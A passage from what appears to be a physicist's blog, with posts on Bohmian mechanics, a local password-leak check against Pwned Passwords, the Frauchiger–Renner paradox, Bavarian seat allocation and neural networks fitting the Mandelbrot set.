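With the calibration at 45°, this model gives about 36.9° at latitude 30°, where the observed value is 30°. A single fixed height cannot match the linear relation at more than one latitude, which is the point of the argument above.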

How would you approach this? The rules are that it must only involve observations available to everyone, no spaceflight, no extra high altitude planes. You are allowed to make use of the phone, cameras, you can travel (say by car or commercial flight but you cannot influence the flight route). It does not involve lots of money or higher math.

Bohmian Rhapsody

2019-02-12T08:17:00.000+01:00

Visits to a Bohmian village

Over all of my physics life, I have been under the local influence of some Gaul villages that have ideas about physics that are not 100% aligned with the main stream views: When I was a student in Hamburg, I was good friends with people working on algebraic quantum field theory. Of course there were opinions that they were the only people seriously working on QFT as they were proving theorems while others dealt with perturbative series only that are known to diverge and are thus obviously worthless. Funnily enough they were literally sitting above the HERA tunnel where electron proton collisions took place that were very well described by exactly those divergent series. Still, I learned a lot from these people and would say there are few that have thought more deeply about structural properties of quantum physics. These days, I use more and more of these things in my own teaching (in particular in our Mathematical Quantum Mechanics and Mathematical Statistical Physics classes as well as when thinking about foundations, see below) and even some other physicists start using their language.

Later, as a PhD student at the Albert Einstein Institute in Potsdam, there was an accumulation point of people from the Loop Quantum Gravity community with Thomas Thiemann and Renate Loll having long term positions and many others frequently visiting. As you probably know, a bit later, I decided (together with Giuseppe Policastro) to look into this more deeply, resulting in a series of papers that were well received at least amongst our peers and about which I am still a bit proud.

Now, I have been in Munich for over ten years. And here at the LMU math department there is a group calling themselves the Workgroup Mathematical Foundations of Physics. And let's be honest, I call them the Bohmians (and sometimes the Bohemians). And once more, most people believe that the Bohmian interpretation of quantum mechanics is just a fringe approach that is not worth wasting any time on. You will have already guessed it: I did so none the less. So here is a condensed report of what I learned and what I think should be the official opinion on this approach. This is an informal write up of a notes paper that I put on the arXiv today.

What Bohmians don't like about the usual approach to quantum mechanics (termed Copenhagen for lack of a better word) is that you are not allowed to talk about so many things and that the observer plays such a prominent role by determining via a measurement what aspect is real and what is not. They think this is far too subjective. So rather, they want quantum mechanics to be about particles that then are allowed to follow trajectories.

"But we know this is impossible!" I hear you cry. So, let's see how this works. The key observation is that the Schrödinger equation for a Hamilton operator of the form kinetic term (possibly with magnetic field) plus potential term, has a conserved current

$$j = -i\left(\bar\psi\nabla\psi - (\nabla\bar\psi)\psi\right).$$

So as your probability density is $\rho=\bar\psi\psi$, you can think of that being made up of particles moving with a velocity field

$$v = j/\rho = 2\Im(\nabla \psi/\psi).$$

What this buys you is that if you have a bunch of particles that is initially distributed like the probability density and follows the flow of the velocity field it will also later be distributed like $|\psi |^2$.
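
In formulas, as a short sketch of the standard argument: conservation of the current means that the density obeys the continuity equation

$$\partial_t\rho + \nabla\cdot j = 0,\qquad j = \rho v,$$

which is exactly the transport equation for a cloud of particles whose positions $q(t)$ follow $\dot q = v(q,t)$. So if the cloud is distributed like $\rho$ at one time, it stays distributed like $\rho$ at all later times.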

What is important is that they keep the Schrödinger equation in tact. So everything that you can do with the original Schrödinger equation (i.e. everything) can be done in the Bohmian approach as well. If you set up your Hamiltonian to describe a double slit experiment, the Bohmian particles will flow nicely to the screen and arrange themselves in interference fringes (as the probability density does). So you will never come to a situation where any experimental outcome will differ from what the Copenhagen prescription predicts.

The price you have to pay, however, is that you end up with a very non-local theory: The velocity field lives in configuration space, so the velocity of every particle depends on the position of all other particles in the universe. I would say, this is already a show stopper (given what we know about quantum field theory whose raison d'être is locality) but let's ignore this aesthetic concern.

What got me into this business was the attempt to understand how set-ups like Bell's inequality and GHZ and the like work out that are supposed to show that quantum mechanics cannot be classical (technically that the state space cannot be described as local probability densities). The problem with those is that they are often phrased in terms of spin degrees of freedom which have Hamiltonians that are not directly of the form above. You can use a Stern-Gerlach-type apparatus to translate the spin degree of freedom to a positional one, but at the price of a Hamiltonian that is not explicitly known, let alone one for which you can analytically solve the Schrödinger equation. So you don't see much.

But from Reinhard Werner and collaborators I learned how to set up qubit-like algebras from positional observables of free particles (at different times, so you get something non-commuting, which you need to make use of entanglement as a specific quantum resource). So here is my favourite example:

You start with two particles each following a free time evolution but confined to an interval. You set those up in a particular entangled state (stationary as it is an eigenstate of the Hamiltonian) built from the two lowest levels of the particle in the box. And then you observe for each particle if it is in the left or the right half of the interval.

From symmetry considerations (details in my paper) you can see that each particle is with the same probability on the left and the right. But they are anti-correlated when measured at the same time. But when measured at different times, the correlation oscillates like the cosine of the time difference.

From the Bohmian perspective, for the static initial state, the velocity field vanishes everywhere, nothing moves. But in order to capture the time dependent correlations, as soon as one particle has been measured, the position of the second particle has to oscillate in the box (how the measurement works in detail is not specified in the Bohmian approach since it involves other degrees of freedom and remember, everything depends on everything but somehow it has to work since you want to produce the correlations that are predicted by the Copenhagen approach).

The trajectory of the second particle depending on its initial position
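
To see in the simplest possible setting why nothing moves in a stationary state but things start to move in a superposition, here is a minimal single-particle sketch. It is not the two-particle state from my paper: I am assuming one particle in the box $[0,\pi]$ with $H=-\partial_x^2$, so that the eigenfunctions are $\sqrt{2/\pi}\sin(nx)$ with energies $n^2$, and the helper names are made up for this illustration.

```python
import cmath
import math

BOX_LENGTH = math.pi  # box [0, pi]; with H = -d^2/dx^2 the energies are n^2


def phi(n, x):
    """n-th eigenfunction of the particle in the box."""
    return math.sqrt(2.0 / BOX_LENGTH) * math.sin(n * x)


def dphi(n, x):
    """Spatial derivative of the n-th eigenfunction."""
    return math.sqrt(2.0 / BOX_LENGTH) * n * math.cos(n * x)


def velocity(coeffs, x, t):
    """Bohmian velocity v = 2 Im(psi'/psi) at position x and time t.

    coeffs maps the level n to its amplitude c_n in
    psi(x, t) = sum_n c_n phi_n(x) exp(-i n^2 t).
    """
    psi = sum(c * phi(n, x) * cmath.exp(-1j * n * n * t)
              for n, c in coeffs.items())
    dpsi = sum(c * dphi(n, x) * cmath.exp(-1j * n * n * t)
               for n, c in coeffs.items())
    return 2.0 * (dpsi / psi).imag


stationary = {1: 1.0}
superposition = {1: 1.0 / math.sqrt(2.0), 2: 1.0 / math.sqrt(2.0)}

if __name__ == "__main__":
    print(velocity(stationary, 1.0, 0.3))      # zero up to rounding
    print(velocity(superposition, 1.0, 0.3))   # clearly non-zero
```

For an energy eigenstate the time dependence is a global phase that cancels in $\psi'/\psi$, so the velocity field vanishes. Once two levels are superposed, the relative phase rotates and the velocity field oscillates with the energy difference.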

This is somehow the Bohmian version of the collapse of the wave function but they would never phrase it that way.

And here is where it becomes problematic: If you could see the Bohmian particle moving you could decide if the other particle has been measured (it would oscillate) or not (it would stand still). No matter where the other particle is located. With this observation you could build a telephone that transmits information instantaneously, something that should not exist. So you have to conclude you must not be able to look at the second particle and see if it oscillates or not.

Bohmians tell you you cannot, because all you are supposed to observe about the particles are their positions (and not their velocity). And if you try to measure the velocity by measuring the position at two instants in time, you fail because the first observation disturbs the particle so much that it invalidates the original state.

As it turns out, you are not allowed to observe anything else about the particles than that they are distributed like $|\psi |^2$ because if you could, you could build a similar telephone (at least statistically) as I explain in the paper (this fact is known in the Bohm literature but I found it nowhere so clearly demonstrated as in this two particle system).

My conclusion is that the Bohm approach adds something (the particle positions) to the wave function but then in the end tells you you are not allowed to observe this or have any knowledge of this beyond what is already encoded in the wave function. It's like making up an invisible friend.

PS: If you haven't seen "Bohemian Rhapsody", yet, you should, even if there are good reasons to criticise the dramatisation of real events.

Has your password been leaked?

2019-01-17T20:43:00.002+01:00

Today, there was news that a huge database containing 773 million email address / password pairs became public. On Have I Been Pwned you can check if any of your email addresses is in this database (or any similar one). I bet it is (mine are).

These lists are very probably the source for the spam emails that have been around for a number of months where the spammer claims they broke into your account and tries to prove it by telling you your password. Hopefully, this is only a years old LinkedIn password that you have changed aeons ago.

To make sure, you actually want to search not for your email but for your password. But of course, you don't want to tell anybody your password. To this end, I have written a small perl script that checks for your password without telling anybody by doing a calculation locally on your computer. You can find it on GitHub.
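
For illustration, here is a minimal Python sketch of how such a local check can work. It is not the perl script mentioned above. I am assuming the range search of the Pwned Passwords service (`https://api.pwnedpasswords.com/range/<first five hex digits of the SHA-1 hash>`), which returns lines of the form `SUFFIX:COUNT`; the function names and the User-Agent string are made up for this sketch.

```python
import hashlib
import urllib.request


def split_hash(password):
    """Return (prefix, suffix) of the upper-case SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix, body):
    """Look up our hash suffix in a response body of 'SUFFIX:COUNT' lines."""
    for line in body.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count)
    return 0


def pwned_count(password):
    """How often the password appears in the leaks (needs network access).

    Only the first five hex digits of the hash leave the computer; the
    comparison with the full hash happens locally.
    """
    prefix, suffix = split_hash(password)
    request = urllib.request.Request(
        "https://api.pwnedpasswords.com/range/" + prefix,
        headers={"User-Agent": "password-check-sketch"},  # hypothetical name
    )
    with urllib.request.urlopen(request) as response:
        body = response.read().decode("utf-8")
    return count_in_range(suffix, body)
```

Calling `pwned_count("your password")` returns 0 if the hash is not in the returned list. The server only learns a five-digit hash prefix that is shared by many other passwords.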

Interfere and it didn't happen

2018-10-26T17:11:00.000+02:00

I am a bit late for the party, but also wanted to share my two cents on the paper "Quantum theory cannot consistently describe the use of itself" by Frauchiger and Renner. After sitting down and working out the math for myself, I found that the analysis in this paper and the blogpost by Scott (including many of the 160+ comments, some by Renner) share a lot with what I am about to say but maybe I can still contribute a slight twist.

Coleman on GHZS

My background is the talk "Quantum Mechanics In Your Face" by Sidney Coleman which I consider as the best argument why quantum mechanics cannot be described by a local and realistic theory (from which I would conclude it is not realistic). In a nutshell, the argument goes like this: Consider the three qubit state

$$\Psi=\frac 1{\sqrt 2}(\uparrow\uparrow\uparrow-\downarrow\downarrow\downarrow)$$

which, if $\uparrow$ and $\downarrow$ are read as the two eigenstates of $\sigma_y$, is both an eigenstate of eigenvalue -1 for $\sigma_z\otimes\sigma_z\otimes\sigma_z$ and an eigenstate of eigenvalue +1 for $\sigma_x\otimes\sigma_x\otimes\sigma_z$ or any permutation. This means that, given that the individual outcomes of measuring a $\sigma$-matrix on a qubit are $\pm 1$, when measuring all in the z-direction there will be an odd number of -1 results but if two spins are measured in x-direction and one in z-direction there is an even number of -1's.

The latter tells us that the outcome of one z-measurement is the product of the two x-measurements on the other two spins. But multiplying this for all three spins we get that in shorthand $ZZZ=(XXX)^2=+1$ in contradiction to the -1 eigenvalue for all z-measurements.

The conclusion is (unless you assume some non-local conspiracy between the spins) that one has to take seriously the fact that on a given spin I cannot measure both $\sigma_x$ and $\sigma_z$ and thus when actually measuring the latter I must not even assume that $X$ has some (although unknown) value $\pm 1$ as it leads to the contradiction. Stuff that I cannot measure does not have a value (that is also my understanding of what "not realistic" means).
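
If you do not trust the multiplication argument, you can let the computer try all possibilities. The following is a minimal brute-force sketch (the function name is made up): it runs through all 64 ways of assigning predetermined values $\pm 1$ to $X$ and $Z$ on each of the three spins and keeps those that reproduce the four predictions quoted above.

```python
from itertools import product


def hidden_value_assignments():
    """Assignments of predetermined values +-1 to X_i and Z_i (i = 1, 2, 3)
    that reproduce all four quantum predictions quoted in the text."""
    solutions = []
    for x1, x2, x3, z1, z2, z3 in product((+1, -1), repeat=6):
        if (z1 * z2 * z3 == -1          # all z: odd number of -1 results
                and x1 * x2 * z3 == +1  # two x, one z: even number of -1
                and x1 * z2 * x3 == +1
                and z1 * x2 * x3 == +1):
            solutions.append((x1, x2, x3, z1, z2, z3))
    return solutions


if __name__ == "__main__":
    print(len(hidden_value_assignments()))  # prints 0
```

The list comes out empty: no assignment of pre-existing values is compatible with all four predictions at once.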

Frauchiger and Renner

Now to the recent Nature paper. In short, they are dealing with two qubits (by which I only mean two state systems). The first is in a box L' (I will try to use the somewhat unfortunate nomenclature from the paper) and the second is in a box L (L stands for lab). For L, we use the usual z-basis of $\uparrow$ and $\downarrow$ as well as the x-basis $\leftarrow = \frac 1{\sqrt 2}(\downarrow - \uparrow)$ and $\rightarrow = \frac 1{\sqrt 2}(\downarrow + \uparrow)$. Similarly, for L' we use the basis $h$ and $t$ (heads and tails as it refers to a coin) as well as $o = \frac 1{\sqrt 2}(h - t)$ and $f = \frac 1{\sqrt 2}(h+t)$. The two qubits are prepared in the state

$$\Phi = \frac{h\otimes\downarrow + \sqrt 2 t\otimes \rightarrow}{\sqrt 3}.$$

Clearly, a measurement of $t$ in box L' implies that box L has to contain the state $\rightarrow$. Call this observation A.

Let's re-express $\rightarrow$ in the z-basis:

$$\Phi =\frac {h\otimes \downarrow + t\otimes \downarrow + t\otimes\uparrow}{\sqrt 3}$$

From which one concludes that an observer inside box L that measures $\uparrow$ concludes that the qubit in box L' is in state $t$. Call this observation B.

Similarly, we can express the same state in the x-basis for L':

$$\Phi = \frac{2 f\otimes \downarrow+ f\otimes \uparrow - o\otimes \uparrow}{\sqrt 6}$$

From this one can conclude that measuring $o$ for the state of L' implies that L is in the state $\uparrow$. Call this observation C.

Using now C, B and A one is tempted to conclude that observing L' to be in state $o$ implies that L is in state $\rightarrow$. When we express the state in the $of\leftarrow\rightarrow$-basis, however, we get

$$\Phi = \frac{f\otimes\leftarrow+ 3f\otimes \rightarrow + o\otimes\leftarrow - o\otimes \rightarrow}{\sqrt{12}}.$$

so with probability 1/12 we find both $o$ and $\leftarrow$. Again, we hit a contradiction.
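
The basis changes above are easy to get wrong by hand, so here is a small numerical cross-check. It is only a sketch with made-up variable names: the state is stored as a real 2x2 array of amplitudes in the $ht$ / $\downarrow\uparrow$ basis and the probability of a joint outcome is the squared overlap with the corresponding product vector.

```python
import math

S2, S3 = math.sqrt(2.0), math.sqrt(3.0)

# Basis vectors as pairs of components:
# for L' along (h, t), for L along (down, up).
h, t = (1.0, 0.0), (0.0, 1.0)
down, up = (1.0, 0.0), (0.0, 1.0)
o = (1 / S2, -1 / S2)      # o = (h - t)/sqrt(2)
f = (1 / S2, 1 / S2)       # f = (h + t)/sqrt(2)
left = (1 / S2, -1 / S2)   # left = (down - up)/sqrt(2)
right = (1 / S2, 1 / S2)   # right = (down + up)/sqrt(2)

# Phi = (h x down + sqrt(2) t x right)/sqrt(3), as amplitudes PHI[i][j].
PHI = [[(h[i] * down[j] + S2 * t[i] * right[j]) / S3 for j in range(2)]
       for i in range(2)]


def probability(a, b):
    """Probability to find L' in state a and L in state b (all real)."""
    amplitude = sum(a[i] * b[j] * PHI[i][j]
                    for i in range(2) for j in range(2))
    return amplitude * amplitude


if __name__ == "__main__":
    print(probability(t, left))   # observation A: vanishes
    print(probability(h, up))     # observation B: vanishes
    print(probability(o, down))   # observation C: vanishes
    print(probability(o, left))   # the troublesome outcome: 1/12
```

The first three numbers vanish up to rounding, which is the content of observations A, B and C, while the last one comes out as $1/12$.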

One is tempted to use the same way out as above in the three qubit case and say one should not argue about counterfactual measurements that are incompatible with measurements that were actually performed. But Frauchiger and Renner found a set-up which seems to avoid that.

They have observers F and F' ("friends") inside the boxes that do the measurements in the $ht$ and $\uparrow\downarrow$ basis whereas later observers W and W' measure the state of the boxes including the observers F and F' in the $of$ and $\leftarrow\rightarrow$ basis. So, at each stage of A, B, C the corresponding measurement has actually taken place and is not counterfactual!

Interference and it did not happen

I believe the way out is to realise that at least from a retrospective perspective, this analysis stretches the language and in particular the word "measurement" to the extreme. In order for W' to measure the state of L' in the $of$-basis, he has to interfere the contents including F' coherently such that there is no leftover of information from F''s measurement of $ht$ remaining. Thus, when W''s measurement is performed one should not really say that F''s measurement has in any real sense happened as no possible information is left over. So it is in any practical sense counterfactual.

To see the alternative, consider a variant of the experiment where a tiny bit of information (maybe the position of one air molecule or the excitation of one of F''s neurons) escapes the interference. Let's call the two possible states of that qubit of information $H$ and $T$ (not necessarily orthogonal) and consider instead the state where that neuron is also entangled with the first qubit:

$$\tilde \Phi = \frac{h\otimes\downarrow\otimes H + \sqrt 2 t\otimes \rightarrow\otimes T}{\sqrt 3}.$$

Then, the result of step C becomes

$$\tilde\Phi = \frac{f\otimes \downarrow\otimes H+ o\otimes \downarrow\otimes H+f\otimes \downarrow\otimes T-o\otimes\downarrow\otimes T + f\otimes \uparrow\otimes T-o \otimes\uparrow\otimes T}{\sqrt 6}.$$

We see that now there is a term containing $o\otimes\downarrow\otimes(H-T)$. Thus, as long as the two possible states of the air molecule/neuron are actually different, observation C is no longer valid and the whole contradiction goes away.

This makes it clear that the whole argument relies on the fact that when W' is doing his measurement any remnant of the measurement by his friend F' is eliminated and thus one should view the measurement of F' as if it never happened. Measuring L' in the $of$-basis really erases the measurement of F' in the complementary $ht$-basis.

Bavarian electoral system

2018-10-17T16:37:00.000+02:00

Last Sunday, we had the election for the federal state of Bavaria. Since the electoral system is kind of odd (but not as odd as first past the post), I would like to analyse how some variations in the rules (assuming the actual distribution of votes) would have worked out. So, first, here is how the seats are actually distributed: Each voter gets two ballots: On the first ballot, each party lists one candidate from the local constituency and you can select one. On the second ballot, you can vote for a party list (it's even more complicated because also there, you can select individual candidates to determine the position on the list but let's ignore that for today).

Then in each constituency, the votes on ballot one are counted. The candidate with the most votes (like in first past the post) gets elected for parliament directly (and is called a "direct candidate"). Then overall, the votes for each party on both ballots (this is where the system differs from the federal elections) are summed up. All votes for parties with less than 5% of the grand total of all votes are discarded (actually including their direct candidates but this is not of practical concern). Let's call the rest the "reduced total". According to the fraction of each party in this reduced total the seats are distributed.

Of course the first problem is that you can only distribute seats in integer multiples of 1. This is solved using the Hare-Niemeyer-method: You first distribute the integer parts. This clearly leaves fewer seats open than the number of parties. Those you then give to the parties where the rounding error to the integer below was greatest. Check out the wikipedia page explaining how this can lead to a party losing seats when the total number of seats available is increased.

Because this is what happens in the next step: Remember that we already allocated a number of seats to constituency winners in the first round. Those count towards the number of seats that each party is supposed to get in step two according to the fraction of votes. Now, it can happen, that a party has won more direct candidates than seats allocated in step two. If that happens, more seats are added to the total number of seats and distributed according to the rules of step two until each party has been allocated at least the number of seats as direct candidates. This happens in particular if one party is stronger than all the other ones leading to that party winning almost all direct candidates (as in Bavaria this happened to the CSU which won all direct candidates except five in Munich and one in Würzburg which were won by the Greens).

A final complication is that Bavaria is split into seven electoral districts and the above procedure is carried out for each district separately. So the rounding and the adding of seats happen seven times.
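
The two steps described above, the Hare-Niemeyer rounding and the adding of seats until all direct candidates are covered, can be sketched in a few lines of Python. This is a minimal illustration of the procedure as I described it, not the legal text and not my perl script. The function names are made up, ties between equal remainders are simply broken by the order of the parties (an assumption), and the 5% threshold and the seven districts are left out.

```python
def hare_niemeyer(votes, seats):
    """Largest-remainder allocation of `seats` among the parties in `votes`."""
    total = sum(votes.values())
    # Integer part of each party's exact quota votes * seats / total.
    allocation = {party: v * seats // total for party, v in votes.items()}
    leftover = seats - sum(allocation.values())
    # The remaining seats go to the largest rounding errors
    # (ties: order of the parties in `votes`, an assumption of this sketch).
    by_remainder = sorted(votes, key=lambda p: votes[p] * seats % total,
                          reverse=True)
    for party in by_remainder[:leftover]:
        allocation[party] += 1
    return allocation


def allocate_with_overhang(votes, direct, base_seats):
    """Enlarge the parliament until every party has at least as many seats
    as it has won constituencies (`direct` maps party -> direct seats).

    Assumes every party with direct seats also has votes, otherwise the
    loop would not terminate.
    """
    seats = base_seats
    while True:
        allocation = hare_niemeyer(votes, seats)
        if all(allocation[p] >= direct.get(p, 0) for p in votes):
            return seats, allocation
        seats += 1
```

As a toy example with made-up numbers: for votes `{"A": 60, "B": 30, "C": 10}` and 10 seats, `hare_niemeyer` gives 6, 3 and 1 seats. If party A has won 8 constituencies, `allocate_with_overhang` has to grow the parliament to 13 seats, which are then distributed as 8, 4 and 1.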

Sunday's election resulted in the following distribution of seats:

After the whole procedure, there are 205 seats distributed as follows

CSU 85 (41.5% of seats)
SPD 22 (10.7% of seats)
FW 27 (13.2% of seats)
GREENS 38 (18.5% of seats)
FDP 11 (5.4% of seats)
AFD 22 (10.7% of seats)

You can find all the total of votes on this page.

Now, for example one can calculate the distribution without districts throwing just everything in a single super-district. Then there are 208 seats distributed as

CSU 85 (40.8%)
SPD 22 (10.6%)
FW 26 (12.5%)
GREENS 40 (19.2%)
FDP 12 (5.8%)
AFD 23 (11.1%)

You can see that in particular the CSU, the party with the biggest number of votes profits from doing the rounding 7 times rather than just once and the last three parties would benefit from giving up districts.

But then there is actually an issue of negative weight of votes: The Greens are particularly strong in Munich, where they managed to win 5 direct seats. If instead those seats had gone to the CSU (as elsewhere), the number of seats for Oberbayern, the district Munich belongs to, would have had to be increased to accommodate those additional direct candidates for the CSU. This would increase the weight of Oberbayern compared to the other districts, which would then be beneficial for the Greens as they are particularly strong in Oberbayern. So if I give all the direct candidates to the CSU (without modifying the numbers of total votes), I get the following distribution:

221 seats

CSU 91 (41.2%)
SPD 24 (10.9%)
FW 28 (12.7%)
GREENS 42 (19.0%)
FDP 12 (5.4%)
AFD 24 (10.9%)

That is, the Greens would have gotten a higher fraction of seats if they had won fewer constituencies. Voting for green candidates in Munich actually hurt the party as a whole!

The effect is not so big that it actually changes majorities (CSU and FW are likely to form a coalition) but still, the constitutional court does not like (predictable) negative weight of votes. Let's see if somebody challenges this election and what that would lead to.

The perl script I used to do this analysis is here.

Postscript:
The above analysis in the last point is not entirely fair as not to win a constituency means getting fewer votes which then are missing from the grand total. Taking this into account makes the effect smaller. In fact, subtracting the votes from the greens that they were leading by in the constituencies they won leads to an almost zero effect:

Seats: 220

CSU 91 41.4%
SPD 24 10.9%
FW 28 12.7%
GREENS 41 18.6%
FDP 12 5.4%
AFD 24 10.9%

Letting the Greens win München Mitte (a newly created constituency that was supposed to act like a bad bank for the CSU, taking up all of central Munich's more left-leaning voters, do I hear somebody say "Gerrymandering"?) yields

Seats: 217

CSU 90 41.5%
SPD 23 10.6%
FW 28 12.9%
GREENS 41 18.9%
FDP 12 5.5%
AFD 23 10.6%

Or letting them win all but Moosach and Würzburg-Stadt where the lead was the smallest:

Seats: 210

CSU 87 41.4%
SPD 22 10.5%
FW 27 12.9%
GREENS 40 19.0%
FDP 11 5.2%
AFD 23 11.0%

Machine Learning for Physics?!?

2018-03-29T21:35:00.000+02:00

Today was the last day of a nice workshop here at the Arnold Sommerfeld Center organised by Thomas Grimm and Sven Krippendorf on the use of Big Data and Machine Learning in string theory. While the former (at this workshop mainly in the form of developments following Kreuzer/Skarke and taking it further for F-theory constructions, orbifolds and the like) appears to be quite advanced as of today, the latter is still in its very early days. At best.

I got the impression that many physicists who have not yet spent much time with this expect deep learning, and in particular deep neural networks, to be some kind of silver bullet that can answer all kinds of questions that humans have not been able to answer despite some effort. I think this hope is at best premature. Looking at the (admittedly impressive) examples where it works (playing Go, classifying images, speech recognition, event filtering at the LHC), these seem to be problems where humans have at least a rough idea how to solve them (if it is not something that humans do every day, like understanding text) and also roughly how one would code it, but that are too messy or vague to be treated by a traditional program.

So, during some of the less entertaining talks I sat down and thought about problems where I would expect neural networks to perform badly. If this approach fails even in simpler cases that are fully under control, one should maybe curb the expectations for the more complex cases that one would love to have the answer for. In the case of the workshop, that would be guessing some topological (discrete) data that depends very discontinuously on the model parameters. Here a simple problem would be a 2-torus wrapped by two 1-branes, where the computer is supposed to compute the number of matter generations arising from open strings at the intersections, i.e. given two branes (in terms of their slope w.r.t. the cycles of the torus), how often do they intersect? Of course these numbers depend sensitively on the slope (as a real number), as for rational slopes [latex]p/q[/latex] and [latex]m/n[/latex] in lowest terms the intersection number is the absolute value of [latex]pn-qm[/latex]. My guess would be that this is almost impossible to get right for a neural network, let alone the much more complicated variants of this simple problem.
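To see how discontinuous this target function is, here is a small Python sketch of the intersection number formula. The function name `intersection_number` is my own choice, and using `fractions.Fraction` for the slopes is an assumption of convenience: it reduces slopes to lowest terms automatically, but cannot represent a vertical brane (zero denominator).

```python
from fractions import Fraction


def intersection_number(slope_a: Fraction, slope_b: Fraction) -> int:
    """Intersection number |p*n - q*m| of two branes with slopes p/q and m/n.

    Fraction keeps numerator and denominator coprime, so p/q and m/n
    are automatically in lowest terms.
    """
    p, q = slope_a.numerator, slope_a.denominator
    m, n = slope_b.numerator, slope_b.denominator
    return abs(p * n - q * m)


if __name__ == "__main__":
    # Slopes 1/2 and 1/3 intersect once ...
    print(intersection_number(Fraction(1, 2), Fraction(1, 3)))
    # ... but nudging 1/3 to 333/1000 changes the answer drastically.
    print(intersection_number(Fraction(1, 2), Fraction(333, 1000)))
```

The two slopes 1/3 and 333/1000 differ by less than a thousandth as real numbers, yet the intersection numbers with the brane of slope 1/2 are 1 and 334, respectively. A network that interpolates smoothly in the slope has no chance of reproducing that.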

Related, but with the possibility for nicer pictures, is the following: Can a neural network learn the shape of the Mandelbrot set? Let me remind those of you who cannot remember the 80s anymore: for a complex number c you repeatedly apply the function
[latex]f_c(z)= z^2 +c[/latex]
starting from 0 and ask if this stays bounded (a quick check shows that once you are outside [latex]|z| < 2[/latex] you cannot avoid running to infinity). You color the point c in the complex plane according to the number of times you have to apply f_c to 0 to leave this circle. I decided to do this for complex numbers x+iy in the rectangle -0.74
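The escape-time count described above can be sketched in a few lines of Python. This is not my Mathematica program, just an illustration; the names `escape_time` and `sample_grid`, the iteration cap `max_iter`, and the rectangle used in the example call are assumptions made for the sketch.

```python
def escape_time(c: complex, max_iter: int = 100) -> int:
    """Number of applications of f_c(z) = z^2 + c to 0 needed to leave |z| <= 2.

    Returns max_iter if the orbit has not escaped by then (the cap is an
    assumption of this sketch; such points are treated as "bounded").
    """
    z = 0j
    for n in range(max_iter):
        if abs(z) > 2.0:
            return n
        z = z * z + c
    return max_iter


def sample_grid(x_min, x_max, y_min, y_max, nx, ny, max_iter=100):
    """Escape times on an nx-by-ny grid of points x+iy (requires nx, ny >= 2)."""
    rows = []
    for j in range(ny):
        y = y_min + (y_max - y_min) * j / (ny - 1)
        row = []
        for i in range(nx):
            x = x_min + (x_max - x_min) * i / (nx - 1)
            row.append(escape_time(complex(x, y), max_iter))
        rows.append(row)
    return rows


if __name__ == "__main__":
    # Hypothetical rectangle covering the whole set, coarse enough to print.
    for row in sample_grid(-2.0, 1.0, -1.5, 1.5, 31, 15, max_iter=50):
        print("".join("#" if n == 50 else "." for n in row))
```

Pairs of grid point and escape time produced this way are the kind of training data one would feed to a learning algorithm.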

I have written a small Mathematica program to compute this image. Built into Mathematica is also a neural network: You can feed training data to the function Predict[]; for me these were 1,000,000 points in this rectangle together with the number of steps it takes each of them to leave the disk of radius 2. Then Mathematica thinks for about 24 hours and spits out a predictor function. Then you can plot this as well:

There is some similarity, but clearly it has no idea about the fractal nature of the Mandelbrot set. If you really believe in magic powers of neural networks, you might even hope that once it has learned the function for this rectangle, one could extrapolate to outside this rectangle. Well, at least in this case, this hope is not justified: The neural network thinks the correct continuation looks like this:

Ehm. No.

All this of course comes with the caveat that I am no expert on neural networks and I did not attempt anything to tune the result. I only took the neural network function built into Mathematica. Maybe, with a bit of coding and TensorFlow, one can do much better. But on the other hand, this is a simple two-dimensional problem. At least for traditional approaches this should be much simpler than the other, much higher-dimensional problems the physicists are really interested in.